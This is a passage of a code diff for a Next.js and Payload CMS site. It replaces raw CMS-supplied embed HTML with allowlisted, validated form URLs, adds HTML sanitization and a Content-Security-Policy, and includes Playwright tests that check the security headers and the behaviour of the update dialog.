+      <DialogTitle id={titleId} sx={{ pr: 8 }}>
+        {dialogTitle}
+      </DialogTitle>
+      <IconButton
+        onClick={onClose}
+        aria-label="Close"
+        sx={{
+          position: "absolute",
+          top: 12,
+          right: 12,
+          color: "text.secondary",
         }}
-      />
-      <Box
-        aria-hidden={!open}
-        sx={(theme) => ({
-          position: "fixed",
-          top: "50%",
-          left: "50%",
-          transform: "translate(-50%, -50%)",
-          width: { xs: "calc(100% - 24px)", sm: "calc(100% - 48px)" },
-          maxWidth: theme.breakpoints.values.md,
-          maxHeight: "calc(100% - 48px)",
-          bgcolor: "common.white",
-          borderRadius: 2,
-          boxShadow: "0px 12px 40px rgba(0,0,0,0.2)",
-          overflow: "hidden",
-          opacity: open ? 1 : 0,
-          pointerEvents: open ? "auto" : "none",
-          transition: "opacity 160ms ease",
-          zIndex: theme.zIndex.modal + 1,
-        })}
       >
-        <IconButton
-          onClick={onClose}
-          aria-label="Close update dialog"
+        <CloseIcon />
+      </IconButton>
+      <DialogContent dividers sx={{ p: 0 }}>
+        <Box
+          component="iframe"
+          title={dialogTitle}
+          src={src}
+          sandbox={IFRAME_SANDBOX}
+          allow={IFRAME_ALLOW}
+          referrerPolicy="strict-origin-when-cross-origin"
+          loading="lazy"
           sx={{
-            position: "absolute",
-            top: 12,
-            right: 12,
-            zIndex: 1,
-            bgcolor: "rgba(255,255,255,0.9)",
-            boxShadow: "0px 2px 10px rgba(0,0,0,0.15)",
-            "&:hover": {
-              bgcolor: "common.white",
-            },
+            display: "block",
+            width: "100%",
+            minHeight: { xs: 640, md: 760 },
+            border: "none",
           }}
-        >
-          <CloseIcon />
-        </IconButton>
-        {iframeSrc ? (
-          <Box
-            component="iframe"
-            title="Update promise form"
-            src={iframeSrc}
-            sx={{
-              width: "100%",
-              minHeight: { xs: 640, md: 760 },
-              border: "none",
-            }}
-          />
-        ) : (
-          <Box
-            sx={{
-              width: "100%",
-              "& iframe": {
-                width: "100%",
-                minHeight: { xs: 640, md: 760 },
-                border: "none",
-              },
-            }}
-            dangerouslySetInnerHTML={{ __html: embedCode }}
-          />
-        )}
-      </Box>
-    </>
+        />
+      </DialogContent>
+    </Dialog>
   );
 };
 

--- a/src/components/ActNowCard/index.tsx
+++ b/src/components/ActNowCard/index.tsx
@@ -57,7 +57,8 @@ export interface ActNowButtonCardProps {
   petition?: ActionContent;
   follow?: ActionContent;
   update?: ActionContent;
-  updateEmbed?: string | null;
+  /** Validated https URL of the update form on an allowlisted provider. */
+  updateFormUrl?: string | null;
   entity?: EntitySummary | null;
   sx?: SxProps<Theme>;
 }
@@ -102,7 +103,7 @@ export const ActNowCard = ({
   petition,
   follow,
   update,
-  updateEmbed,
+  updateFormUrl,
   entity,
   sx,
 }: ActNowButtonCardProps) => {
@@ -161,8 +162,8 @@ export const ActNowCard = ({
     );
   };
 
-  const embedCode = (updateEmbed ?? "").trim();
-  const payloadConfigured = Boolean(embedCode);
+  const formUrl = (updateFormUrl ?? "").trim();
+  const payloadConfigured = Boolean(formUrl);
 
   const updateButtonLabel = (update?.title ?? "").trim() || "Update";
 
@@ -364,7 +365,8 @@ export const ActNowCard = ({
         <UpdateDialog
           open={updateOpen}
           onClose={handleCloseUpdate}
-          embedCode={embedCode}
+          src={formUrl}
+          title={updateButtonLabel}
         />
       ) : null}
       <Snackbar

--- a/src/components/Newsletter/Newsletter.tsx
+++ b/src/components/Newsletter/Newsletter.tsx
@@ -4,6 +4,9 @@ import Image from "next/image";
 
 import email from "@/assets/subscribe-email.svg?url";
 import { getDomain } from "@/lib/domain";
+import { getMailchimpBotFieldName } from "@/lib/embeds/validation";
+import { sanitizeNewsletterEmbedHtml } from "@/lib/embeds/sanitize";
+import { isAllowedFormActionUrl } from "@/lib/security/embedPolicy.mjs";
 import {
   getTenantBySubDomain,
   getTenantSiteSettings,
@@ -40,11 +43,23 @@ const Newsletter = async ({ image }: NewsletterBlockProps) => {
     return null;
   }
 
-  const { title, description, embedCode } = newsletter;
+  const { title, description, signupUrl, embedCode } = newsletter;
 
-  if (!title || !embedCode) {
+  // Preferred: structured provider configuration (Mailchimp form action
+  // URL) rendered as a first-party form. Legacy embed HTML is only used
+  // as a fallback, after strict sanitization.
+  const safeSignupUrl =
+    signupUrl && isAllowedFormActionUrl(signupUrl) ? signupUrl.trim() : null;
+  const sanitizedEmbedCode =
+    !safeSignupUrl && embedCode ? sanitizeNewsletterEmbedHtml(embedCode) : null;
+
+  if (!title || (!safeSignupUrl && !sanitizedEmbedCode)) {
     return null;
   }
+
+  const botFieldName = safeSignupUrl
+    ? getMailchimpBotFieldName(safeSignupUrl)
+    : null;
   const imageMedia =
     image && typeof image === "object" ? (image as Media) : null;
 
@@ -187,12 +202,97 @@ const Newsletter = async ({ image }: NewsletterBlockProps) => {
                   {description}
                 </Typography>
               ) : null}
-              <Box
-                sx={formSx}
-                dangerouslySetInnerHTML={{
-                  __html: embedCode,
-                }}
-              />
+              {safeSignupUrl ? (
+                <Box
+                  component="form"
+                  action={safeSignupUrl}
+                  method="post"
+                  target="_blank"
+                  sx={{
+                    display: "flex",
+                    flexDirection: "column",
+                    gap: 1,
+                  }}
+                >
+                  <Box
+                    component="input"
+                    type="email"
+                    name="EMAIL"
+                    required
+                    placeholder="Email Address"
+                    aria-label="Email Address"
+                    sx={{
+                      background: "none",
+                      border: "none",
+                      borderBottom: "1px solid currentColor",
+                      borderRadius: 0,
+                      color: "currentColor",
+                      fontFamily: "inherit",
+                      fontSize: "18px",
+                      fontStyle: "normal",
+                      fontWeight: 400,
+                      margin: "1rem 0",
+                      width: "100%",
+                      "&:focus": {
+                        outline: "none",
+                      },
+                      "&::placeholder": {
+                        opacity: 1,
+                      },
+                    }}
+                  />
+                  {botFieldName ? (
+                    // Mailchimp anti-bot honeypot, mirrored from their
+                    // own embed markup; must stay empty and off-screen.
+                    <Box
+                      component="input"
+                      type="text"
+                      name={botFieldName}
+                      tabIndex={-1}
+                      defaultValue=""
+                      autoComplete="off"
+                      aria-hidden="true"
+                      sx={{ position: "absolute", left: "-5000px" }}
+                    />
+                  ) : null}
+                  <Box
+                    component="button"
+                    type="submit"
+                    sx={{
+                      background: "none",
+                      backgroundImage: `url("${email}")`,
+                      backgroundRepeat: "no-repeat",
+                      backgroundSize: "100% 100%",
+                      border: "none",
+                      cursor: "pointer",
+                      height: 45,
+                      width: 140,
+                      padding: 0,
+                      color: "transparent",
+                      fontSize: 0,
+                      textIndent: "-9999px",
+                      "&:hover, &:focus": {
+                        background: "none",
+                        backgroundImage: `url("${email}")`,
+                        backgroundRepeat: "no-repeat",
+                        backgroundSize: "100% 100%",
+                        border: "none",
+                      },
+                    }}
+                  >
+                    Subscribe
+                  </Box>
+                </Box>
+              ) : (
+                <Box
+                  sx={formSx}
+                  dangerouslySetInnerHTML={{
+                    // Sanitized above: scripts, iframes, event handlers,
+                    // and non-allowlisted form actions are stripped.
+                    __html: sanitizedEmbedCode ?? "",
+                  }}
+                />
+              )}
             </Box>
           </Grid>
         </Grid>

--- a/src/components/PromiseActions/index.tsx
+++ b/src/components/PromiseActions/index.tsx
@@ -35,7 +35,8 @@ type ActionContent = {
 type PromiseActionsProps = {
   share?: ShareContent;
   update?: ActionContent;
-  updateEmbed?: string | null;
+  /** Validated https URL of the update form on an allowlisted provider. */
+  updateFormUrl?: string | null;
   updateLabel?: string | null;
 };
 
@@ -77,15 +78,15 @@ const getShareMetadata = (share?: ShareContent) => {
 const PromiseActions = ({
   share,
   update,
-  updateEmbed,
+  updateFormUrl,
   updateLabel,
 }: PromiseActionsProps) => {
   const [shareOpen, setShareOpen] = useState(false);
   const [updateOpen, setUpdateOpen] = useState(false);
   const [copySuccess, setCopySuccess] = useState(false);
 
-  const embedCode = (updateEmbed ?? "").trim();
-  const hasUpdate = Boolean(embedCode);
+  const formUrl = (updateFormUrl ?? "").trim();
+  const hasUpdate = Boolean(formUrl);
   const updateButtonLabel =
     updateLabel?.trim() || update?.title?.trim() || "Submit Update";
 
@@ -257,7 +258,8 @@ const PromiseActions = ({
         <UpdateDialog
           open={updateOpen}
           onClose={handleCloseUpdate}
-          embedCode={embedCode}
+          src={formUrl}
+          title={updateButtonLabel}
         />
       ) : null}
 

--- a/src/globals/PromiseUpdates.ts
+++ b/src/globals/PromiseUpdates.ts
@@ -1,5 +1,10 @@
 import { GlobalConfig } from "payload";
 
+import {
+  validateUpdateEmbedCodeField,
+  validateUpdateFormUrlField,
+} from "@/lib/embeds/validation";
+
 export const PromiseUpdates: GlobalConfig = {
   slug: "promise-updates",
   label: {
@@ -30,20 +35,40 @@ export const PromiseUpdates: GlobalConfig = {
       },
     },
     {
-      name: "embedCode",
-      type: "code",
-      required: true,
+      name: "formUrl",
+      type: "text",
       localized: true,
+      validate: (value: string | null | undefined) =>
+        validateUpdateFormUrlField(value),
       admin: {
-        language: "html",
         description: {
-          en: "Paste the Airtable embed snippet that should appear inside the update dialog.",
-          fr: "Collez le code d'intégration Airtable à afficher dans la boîte de dialogue de mise à jour.",
+          en: "Preferred. The https URL of the Airtable shared form, e.g. https://airtable.com/embed/app…/shr…. Only approved embed providers are accepted.",
+          fr: "Recommandé. L'URL https du formulaire partagé Airtable, p. ex. https://airtable.com/embed/app…/shr…. Seuls les fournisseurs d'intégration approuvés sont acceptés.",
         },
       },
       label: {
-        en: "Airtable Embed Code",
-        fr: "Code d'intégration Airtable",
+        en: "Update Form URL",
+        fr: "URL du formulaire de mise à jour",
+      },
+    },
+    {
+      name: "embedCode",
+      type: "code",
+      localized: true,
+      validate: (
+        value: string | null | undefined,
+        { siblingData }: { siblingData: Partial<{ formUrl?: string | null }> },
+      ) => validateUpdateEmbedCodeField(value, siblingData?.formUrl),
+      admin: {
+        language: "html",
+        description: {
+          en: "Legacy. Paste the Airtable iframe embed snippet. The iframe src must be on an approved embed provider; scripts are rejected. Prefer the Update Form URL field above.",
+          fr: "Hérité. Collez le code d'intégration iframe Airtable. La source de l'iframe doit provenir d'un fournisseur approuvé ; les scripts sont rejetés. Préférez le champ URL du formulaire ci-dessus.",
+        },
+      },
+      label: {
+        en: "Airtable Embed Code (legacy)",
+        fr: "Code d'intégration Airtable (hérité)",
       },
     },
     {

--- a/src/lib/data/promiseUpdates.ts
+++ b/src/lib/data/promiseUpdates.ts
@@ -13,9 +13,10 @@ export const getPromiseUpdateEmbed =
         depth: 2,
         ...(locale ? { locale } : {}),
       });
-      const { embedCode, updateLabel, defaultImage } = doc;
+      const { formUrl, embedCode, updateLabel, defaultImage } = doc;
 
       return {
+        formUrl,
         embedCode,
         updateLabel,
         defaultImage: defaultImage as Media,

--- a/src/lib/embeds/sanitize.ts
+++ b/src/lib/embeds/sanitize.ts
@@ -1,0 +1,93 @@
+/**
+ * Server-side sanitization for legacy CMS-authored newsletter embed
+ * HTML (Mailchimp signup snippets). New configurations should use the
+ * structured `signupUrl` field instead; this is the safety net for
+ * snippets that predate it.
+ *
+ * Policy: static markup and signup-form elements only. Scripts,
+ * styles, iframes, inline event handlers, and non-https URLs are
+ * stripped, and any <form> whose action is not on an approved
+ * newsletter provider (see src/lib/security/embedPolicy.mjs) is
+ * removed entirely.
+ */
+
+import sanitizeHtml from "sanitize-html";
+
+import { isAllowedFormActionUrl } from "@/lib/security/embedPolicy.mjs";
+
+const ALLOWED_INPUT_TYPES = new Set([
+  "text",
+  "email",
+  "submit",
+  "hidden",
+  "checkbox",
+  "radio",
+]);
+
+const sanitizeOptions: sanitizeHtml.IOptions = {
+  allowedTags: [
+    "div",
+    "p",
+    "span",
+    "strong",
+    "em",
+    "small",
+    "br",
+    "h1",
+    "h2",
+    "h3",
+    "h4",
+    "h5",
+    "h6",
+    "ul",
+    "ol",
+    "li",
+    "a",
+    "form",
+    "label",
+    "input",
+    "button",
+  ],
+  allowedAttributes: {
+    "*": ["class", "id"],
+    form: ["class", "id", "action", "method", "target", "name", "novalidate"],
+    input: [
+      "class",
+      "id",
+      "type",
+      "name",
+      "value",
+      "placeholder",
+      "required",
+      "tabindex",
+      "autocomplete",
+      "aria-label",
+      "aria-hidden",
+      "aria-required",
+    ],
+    label: ["class", "id", "for"],
+    button: ["class", "id", "type", "name"],
+    a: ["class", "id", "href", "target", "rel"],
+  },
+  allowedSchemes: ["https", "mailto"],
+  allowProtocolRelative: false,
+  exclusiveFilter: (frame) => {
+    if (frame.tag === "form") {
+      return !isAllowedFormActionUrl(frame.attribs?.action);
+    }
+    if (frame.tag === "input") {
+      const type = (frame.attribs?.type || "text").toLowerCase();
+      return !ALLOWED_INPUT_TYPES.has(type);
+    }
+    return false;
+  },
+  transformTags: {
+    a: (tagName, attribs) => ({
+      tagName,
+      attribs: { ...attribs, rel: "noopener noreferrer" },
+    }),
+  },
+};
+
+export const sanitizeNewsletterEmbedHtml = (html: string): string =>
+  sanitizeHtml(html, sanitizeOptions);

--- a/src/lib/embeds/validation.ts
+++ b/src/lib/embeds/validation.ts
@@ -1,0 +1,208 @@
+/**
+ * Validation and URL helpers for CMS-configured embeds.
+ *
+ * Kept free of heavy dependencies (no sanitize-html) because the
+ * Payload field validators below are bundled into the admin client.
+ * The origin allowlist lives in src/lib/security/embedPolicy.mjs and
+ * is shared with the Content-Security-Policy.
+ */
+
+import {
+  IFRAME_EMBED_PROVIDERS,
+  FORM_ACTION_PROVIDERS,
+  isAllowedFormActionUrl,
+  isAllowedIframeUrl,
+} from "@/lib/security/embedPolicy.mjs";
+
+const describeHosts = (providers: { hosts: string[] }[]) =>
+  providers.flatMap(({ hosts }) => hosts).join(", ");
+
+const IFRAME_HOSTS_LABEL = describeHosts(IFRAME_EMBED_PROVIDERS);
+const FORM_HOSTS_LABEL = describeHosts(FORM_ACTION_PROVIDERS);
+
+const SCRIPT_TAG_PATTERN = /<\s*script\b/i;
+const EVENT_HANDLER_PATTERN = /\son\w+\s*=/i;
+
+/** Extracts the `src` of the first <iframe> in an embed snippet. */
+export const extractIframeSrc = (
+  embedCode?: string | null,
+): string | null => {
+  if (!embedCode) {
+    return null;
+  }
+  const match = embedCode.match(/<iframe[^>]*\ssrc=["']([^"']+)["']/i);
+  return match?.[1]?.trim() || null;
+};
+
+export type UpdateFormSettings = {
+  formUrl?: string | null;
+  embedCode?: string | null;
+} | null;
+
+/**
+ * Resolves the promise-update form URL from the structured `formUrl`
+ * field, falling back to the src of a legacy iframe embed snippet.
+ * Returns null unless the resulting URL is https and on an approved
+ * iframe embed host — non-allowlisted embeds are rejected outright.
+ */
+export const resolveUpdateFormUrl = (
+  settings: UpdateFormSettings | undefined,
+): string | null => {
+  if (!settings) {
+    return null;
+  }
+  const candidate =
+    settings.formUrl?.trim() || extractIframeSrc(settings.embedCode);
+  return candidate && isAllowedIframeUrl(candidate) ? candidate : null;
+};
+
+export type UpdateFormPrefill = {
+  promiseTitle?: string | null;
+  promiseUrl?: string | null;
+  updateDate?: string | Date | null;
+};
+
+const formatPrefillDate = (
+  value: string | Date | null | undefined,
+): string | null => {
+  if (!value) {
+    return null;
+  }
+  const date = new Date(value);
+  return Number.isNaN(date.getTime()) ? null : date.toISOString().slice(0, 10);
+};
+
+/**
+ * Adds Airtable prefill query params (Promise, CheckMedia Link, Date)
+ * to an already-validated update form URL.
+ */
+export const withUpdateFormPrefill = (
+  formUrl: string,
+  { promiseTitle, promiseUrl, updateDate }: UpdateFormPrefill,
+): string => {
+  let url: URL;
+  try {
+    url = new URL(formUrl);
+  } catch {
+    return formUrl;
+  }
+  if (promiseTitle?.trim()) {
+    url.searchParams.set("prefill_Promise", promiseTitle.trim());
+  }
+  if (promiseUrl?.trim()) {
+    url.searchParams.set("prefill_CheckMedia Link", promiseUrl.trim());
+    url.searchParams.set("hide_CheckMedia Link", "true");
+  }
+  const formattedDate = formatPrefillDate(updateDate);
+  if (formattedDate) {
+    url.searchParams.set("prefill_Date", formattedDate);
+  }
+  return url.toString();
+};
+
+/**
+ * Derives the Mailchimp anti-bot honeypot field name (`b_<u>_<id>`)
+ * from a signup form action URL, mirroring Mailchimp's own embeds.
+ */
+export const getMailchimpBotFieldName = (
+  signupUrl: string,
+): string | null => {
+  try {
+    const url = new URL(signupUrl);
+    const u = url.searchParams.get("u");
+    const id = url.searchParams.get("id");
+    return u && id ? `b_${u}_${id}` : null;
+  } catch {
+    return null;
+  }
+};
+
+/* -------------------------------------------------------------------
+ * Payload field validators
+ * ---------------------------------------------------------------- */
+
+type FieldValidationResult = true | string;
+
+/** Validates the structured promise-update form URL field. */
+export const validateUpdateFormUrlField = (
+  value: string | null | undefined,
+): FieldValidationResult => {
+  if (!value?.trim()) {
+    return true;
+  }
+  return isAllowedIframeUrl(value)
+    ? true
+    : `Must be an https URL on an approved embed provider (${IFRAME_HOSTS_LABEL}).`;
+};
+
+/**
+ * Validates a legacy promise-update embed snippet: it must be a plain
+ * <iframe> embed from an approved provider, with no scripts or inline
+ * event handlers.
+ */
+export const validateUpdateEmbedCodeField = (
+  value: string | null | undefined,
+  siblingFormUrl?: string | null,
+): FieldValidationResult => {
+  if (!value?.trim()) {
+    return siblingFormUrl?.trim()
+      ? true
+      : "Provide the update form URL (preferred) or a legacy embed snippet.";
+  }
+  if (SCRIPT_TAG_PATTERN.test(value)) {
+    return "Embed snippets must not contain <script> tags.";
+  }
+  if (EVENT_HANDLER_PATTERN.test(value)) {
+    return "Embed snippets must not contain inline event handlers.";
+  }
+  const src = extractIframeSrc(value);
+  if (!src) {
+    return "Embed snippet must contain an <iframe> with a src attribute.";
+  }
+  return isAllowedIframeUrl(src)
+    ? true
+    : `The iframe src must be an https URL on an approved embed provider (${IFRAME_HOSTS_LABEL}).`;
+};
+
+/** Validates the structured newsletter signup form action URL field. */
+export const validateNewsletterSignupUrlField = (
+  value: string | null | undefined,
+): FieldValidationResult => {
+  if (!value?.trim()) {
+    return true;
+  }
+  return isAllowedFormActionUrl(value)
+    ? true
+    : `Must be an https URL on an approved newsletter provider (${FORM_HOSTS_LABEL}).`;
+};
+
+/**
+ * Validates a legacy newsletter embed snippet: no scripts, no inline
+ * event handlers, no iframes, and any form action must point at an
+ * approved newsletter provider. The snippet is additionally sanitized
+ * at render time.
+ */
+export const validateNewsletterEmbedCodeField = (
+  value: string | null | undefined,
+  siblingSignupUrl?: string | null,
+): FieldValidationResult => {
+  if (!value?.trim()) {
+    return siblingSignupUrl?.trim()
+      ? true
+      : "Provide the signup form URL (preferred) or a legacy embed snippet.";
+  }
+  if (SCRIPT_TAG_PATTERN.test(value)) {
+    return "Embed snippets must not contain <script> tags.";
+  }
+  if (EVENT_HANDLER_PATTERN.test(value)) {
+    return "Embed snippets must not contain inline event handlers.";
+  }
+  if (/<\s*iframe\b/i.test(value)) {
+    return "Newsletter embeds must not contain iframes.";
+  }
+  const actionMatch = value.match(/<form[^>]*\saction=["']([^"']+)["']/i);
+  if (actionMatch && !isAllowedFormActionUrl(actionMatch[1])) {
+    return `The form action must be an https URL on an approved newsletter provider (${FORM_HOSTS_LABEL}).`;
+  }
+  return true;
+};

--- a/src/lib/security/embedPolicy.mjs
+++ b/src/lib/security/embedPolicy.mjs
@@ -1,0 +1,87 @@
+/**
+ * Single source of truth for the third-party embed trust boundary.
+ *
+ * Plain ESM (`.mjs`) so it can be imported both by `next.config.mjs`
+ * (which cannot load TypeScript) and by application/TypeScript code,
+ * keeping the CSP and the runtime embed validation in lockstep.
+ *
+ * To approve a new embed provider, add an entry here and document the
+ * decision in docs/security/embeds-and-csp.md.
+ */
+
+/**
+ * Providers whose pages may be embedded in an <iframe> (promise-update
+ * dialog). `hosts` entries are exact hostnames, or `*.example.com` to
+ * allow any subdomain of example.com (but not example.com itself).
+ * `cspSource` feeds the `frame-src` CSP directive.
+ */
+export const IFRAME_EMBED_PROVIDERS = [
+  {
+    provider: "airtable",
+    hosts: ["airtable.com"],
+    cspSource: "https://airtable.com",
+  },
+];
+
+/**
+ * Origins that embedded/legacy newsletter forms may submit to.
+ * `cspSource` feeds the `form-action` CSP directive.
+ */
+export const FORM_ACTION_PROVIDERS = [
+  {
+    provider: "mailchimp",
+    hosts: ["*.list-manage.com"],
+    cspSource: "https://*.list-manage.com",
+  },
+];
+
+/**
+ * @param {string} hostname lowercase hostname to test
+ * @param {string[]} patterns exact hostnames or `*.suffix` wildcards
+ */
+const hostMatches = (hostname, patterns) =>
+  patterns.some((pattern) => {
+    if (pattern.startsWith("*.")) {
+      const suffix = pattern.slice(1); // ".list-manage.com"
+      return hostname.endsWith(suffix) && hostname.length > suffix.length;
+    }
+    return hostname === pattern;
+  });
+
+/**
+ * @param {unknown} value candidate URL
+ * @param {{ hosts: string[] }[]} providers
+ * @returns {boolean} true when value is an https URL on an approved host
+ */
+const isAllowedEmbedUrl = (value, providers) => {
+  if (typeof value !== "string" || !value.trim()) {
+    return false;
+  }
+  let url;
+  try {
+    url = new URL(value.trim());
+  } catch {
+    return false;
+  }
+  if (url.protocol !== "https:") {
+    return false;
+  }
+  const hostname = url.hostname.toLowerCase();
+  return providers.some(({ hosts }) => hostMatches(hostname, hosts));
+};
+
+/** @param {unknown} value */
+export const isAllowedIframeUrl = (value) =>
+  isAllowedEmbedUrl(value, IFRAME_EMBED_PROVIDERS);
+
+/** @param {unknown} value */
+export const isAllowedFormActionUrl = (value) =>
+  isAllowedEmbedUrl(value, FORM_ACTION_PROVIDERS);
+
+export const iframeCspSources = IFRAME_EMBED_PROVIDERS.map(
+  ({ cspSource }) => cspSource
+);
+
+export const formActionCspSources = FORM_ACTION_PROVIDERS.map(
+  ({ cspSource }) => cspSource
+);

--- a/src/lib/security/headers.mjs
+++ b/src/lib/security/headers.mjs
@@ -1,0 +1,98 @@
+/**
+ * Builds the Content-Security-Policy and baseline security headers
+ * applied to every response via `headers()` in next.config.mjs.
+ *
+ * Plain ESM (`.mjs`) so next.config.mjs can import it. The embed
+ * origins come from embedPolicy.mjs so the CSP always matches the
+ * runtime embed allowlist.
+ *
+ * Directive rationale (see docs/security/embeds-and-csp.md):
+ * - script-src 'unsafe-inline': Next.js bootstrap and Payload Admin
+ *   inject inline scripts; nonce-based CSP would require middleware
+ *   rewriting which conflicts with the standalone/tunnelled setup.
+ *   'unsafe-eval' is added in development only (React Refresh/HMR).
+ * - style-src 'unsafe-inline': MUI/Emotion inject inline <style> tags.
+ * - img-src/media-src https:: tenant media may be served from remote
+ *   object storage / CDNs configured per deployment.
+ * - connect-src *.sentry.io: browser SDK fallback when the /monitoring
+ *   tunnel route is bypassed; 'self' covers the tunnel and Payload API.
+ * - frame-src: only approved embed providers (promise-update dialog)
+ *   plus 'self' for Payload Admin live preview.
+ * - form-action: 'self' plus approved newsletter providers.
+ */
+
+import {
+  formActionCspSources,
+  iframeCspSources,
+} from "./embedPolicy.mjs";
+
+/**
+ * @param {{ isDev?: boolean }} [options]
+ * @returns {string}
+ */
+export const buildContentSecurityPolicy = ({ isDev = false } = {}) => {
+  const directives = {
+    "default-src": ["'self'"],
+    "script-src": [
+      "'self'",
+      "'unsafe-inline'",
+      ...(isDev ? ["'unsafe-eval'"] : []),
+    ],
+    "style-src": ["'self'", "'unsafe-inline'"],
+    "img-src": ["'self'", "blob:", "data:", "https:"],
+    "font-src": ["'self'", "data:"],
+    "connect-src": [
+      "'self'",
+      "https://*.sentry.io",
+      ...(isDev ? ["ws:", "wss:"] : []),
+    ],
+    "worker-src": ["'self'", "blob:"],
+    "media-src": ["'self'", "blob:", "data:", "https:"],
+    "frame-src": ["'self'", ...iframeCspSources],
+    "form-action": ["'self'", ...formActionCspSources],
+    "frame-ancestors": ["'self'"],
+    "object-src": ["'none'"],
+    "base-uri": ["'self'"],
+  };
+
+  return Object.entries(directives)
+    .map(([directive, sources]) => `${directive} ${sources.join(" ")}`)
+    .join("; ");
+};
+
+/**
+ * @param {{ isDev?: boolean }} [options]
+ * @returns {{ key: string, value: string }[]}
+ */
+export const buildSecurityHeaders = ({ isDev = false } = {}) => [
+  {
+    key: "Content-Security-Policy",
+    value: buildContentSecurityPolicy({ isDev }),
+  },
+  {
+    key: "X-Content-Type-Options",
+    value: "nosniff",
+  },
+  {
+    key: "Referrer-Policy",
+    value: "strict-origin-when-cross-origin",
+  },
+  {
+    // Legacy fallback for frame-ancestors 'self'.
+    key: "X-Frame-Options",
+    value: "SAMEORIGIN",
+  },
+  {
+    key: "Permissions-Policy",
+    value:
+      "camera=(), microphone=(), geolocation=(), payment=(), usb=(), interest-cohort=()",
+  },
+  ...(isDev
+    ? []
+    : [
+        {
+          key: "Strict-Transport-Security",
+          value: "max-age=63072000; includeSubDomains",
+        },
+      ]),
+];

--- a/src/payload-types.ts
+++ b/src/payload-types.ts
@@ -959,7 +959,14 @@ export interface SiteSetting {
   newsletter: {
     title: string;
     description: string;
-    embedCode: string;
+    /**
+     * Preferred. The Mailchimp form action URL, e.g. https://example.us1.list-manage.com/subscribe/post?u=…&id=…. Only approved newsletter providers are accepted.
+     */
+    signupUrl?: string | null;
+    /**
+     * Legacy. Sanitized before rendering: scripts, iframes, event handlers, and forms posting to unapproved providers are removed. Prefer the Signup Form URL field above.
+     */
+    embedCode?: string | null;
   };
   actNow: {
     title: string;
@@ -1796,6 +1803,7 @@ export interface SiteSettingsSelect<T extends boolean = true> {
     | {
         title?: T;
         description?: T;
+        signupUrl?: T;
         embedCode?: T;
       };
   actNow?:
@@ -2534,9 +2542,13 @@ export interface PromiseUpdate {
    */
   defaultImage: string | Media;
   /**
-   * Paste the Airtable embed snippet that should appear inside the update dialog.
+   * Preferred. The https URL of the Airtable shared form, e.g. https://airtable.com/embed/app…/shr…. Only approved embed providers are accepted.
    */
-  embedCode: string;
+  formUrl?: string | null;
+  /**
+   * Legacy. Paste the Airtable iframe embed snippet. The iframe src must be on an approved embed provider; scripts are rejected. Prefer the Update Form URL field above.
+   */
+  embedCode?: string | null;
   /**
    * The label that should appear on the update dialog trigger button.
    */
@@ -2671,7 +2683,14 @@ export interface GlobalSiteSetting {
   newsletter: {
     title: string;
     description: string;
-    embedCode: string;
+    /**
+     * Preferred. The Mailchimp form action URL, e.g. https://example.us1.list-manage.com/subscribe/post?u=…&id=…. Only approved newsletter providers are accepted.
+     */
+    signupUrl?: string | null;
+    /**
+     * Legacy. Sanitized before rendering: scripts, iframes, event handlers, and forms posting to unapproved providers are removed. Prefer the Signup Form URL field above.
+     */
+    embedCode?: string | null;
   };
   actNow: {
     title: string;
@@ -2859,6 +2878,7 @@ export interface SettingsSelect<T extends boolean = true> {
  */
 export interface PromiseUpdatesSelect<T extends boolean = true> {
   defaultImage?: T;
+  formUrl?: T;
   embedCode?: T;
   updateLabel?: T;
   updatedAt?: T;
@@ -2954,6 +2974,7 @@ export interface GlobalSiteSettingsSelect<T extends boolean = true> {
     | {
         title?: T;
         description?: T;
+        signupUrl?: T;
         embedCode?: T;
       };
   actNow?:

--- a/src/types/promiseUpdates.ts
+++ b/src/types/promiseUpdates.ts
@@ -1,7 +1,8 @@
 import type { Media } from "@/payload-types";
 
 export type PromiseUpdateSettings = {
-  embedCode: string;
+  formUrl?: string | null;
+  embedCode?: string | null;
   updateLabel?: string | null;
   defaultImage: Media | null;
 };

--- a/tests/e2e/security.e2e.spec.ts
+++ b/tests/e2e/security.e2e.spec.ts
@@ -1,0 +1,105 @@
+import { test, expect } from "@playwright/test";
+
+const BASE_URL = "http://localhost:3000";
+
+test.describe("Security headers", () => {
+  test("responses carry the CSP and baseline security headers", async ({
+    page,
+  }) => {
+    const response = await page.goto(BASE_URL);
+    expect(response).not.toBeNull();
+    const headers = response!.headers();
+
+    const csp = headers["content-security-policy"];
+    expect(csp).toBeTruthy();
+    expect(csp).toContain("default-src 'self'");
+    expect(csp).toContain("frame-src 'self' https://airtable.com");
+    expect(csp).toContain("form-action 'self' https://*.list-manage.com");
+    expect(csp).toContain("object-src 'none'");
+    expect(csp).toContain("frame-ancestors 'self'");
+    expect(csp).toContain("base-uri 'self'");
+
+    expect(headers["x-content-type-options"]).toBe("nosniff");
+    expect(headers["referrer-policy"]).toBe("strict-origin-when-cross-origin");
+    expect(headers["x-frame-options"]).toBe("SAMEORIGIN");
+    expect(headers["permissions-policy"]).toContain("camera=()");
+  });
+});
+
+test.describe("Promise update dialog", () => {
+  test.beforeEach(async ({ page }) => {
+    await page.goto(`${BASE_URL}/dev/update-dialog`);
+  });
+
+  test("renders as a labelled modal with a sandboxed allowlisted iframe", async ({
+    page,
+  }) => {
+    await page.getByTestId("open-update-dialog").click();
+
+    const dialog = page.getByRole("dialog", {
+      name: "Submit a promise update",
+    });
+    await expect(dialog).toBeVisible();
+
+    const iframe = dialog.locator("iframe");
+    await expect(iframe).toHaveAttribute("src", /^https:\/\/airtable\.com\//);
+    await expect(iframe).toHaveAttribute("sandbox", /allow-scripts/);
+    await expect(iframe).toHaveAttribute("sandbox", /allow-forms/);
+    // No capability beyond the documented minimum.
+    const sandbox = await iframe.getAttribute("sandbox");
+    expect(sandbox).not.toContain("allow-top-navigation");
+    expect(sandbox).not.toContain("allow-downloads");
+    await expect(iframe).toHaveAttribute(
+      "referrerpolicy",
+      "strict-origin-when-cross-origin",
+    );
+  });
+
+  test("traps focus, closes on Escape, and restores focus to the trigger", async ({
+    page,
+  }) => {
+    const trigger = page.getByTestId("open-update-dialog");
+    await trigger.focus();
+    await page.keyboard.press("Enter");
+
+    const dialog = page.getByRole("dialog");
+    await expect(dialog).toBeVisible();
+
+    // Focus moves into the dialog when it opens.
+    expect(
+      await dialog.evaluate((el) => el.contains(document.activeElement)),
+    ).toBe(true);
+
+    // Tabbing repeatedly must not leak focus out of the modal.
+    for (let i = 0; i < 6; i += 1) {
+      await page.keyboard.press("Tab");
+      expect(
+        await dialog.evaluate((el) => el.contains(document.activeElement)),
+      ).toBe(true);
+    }
+
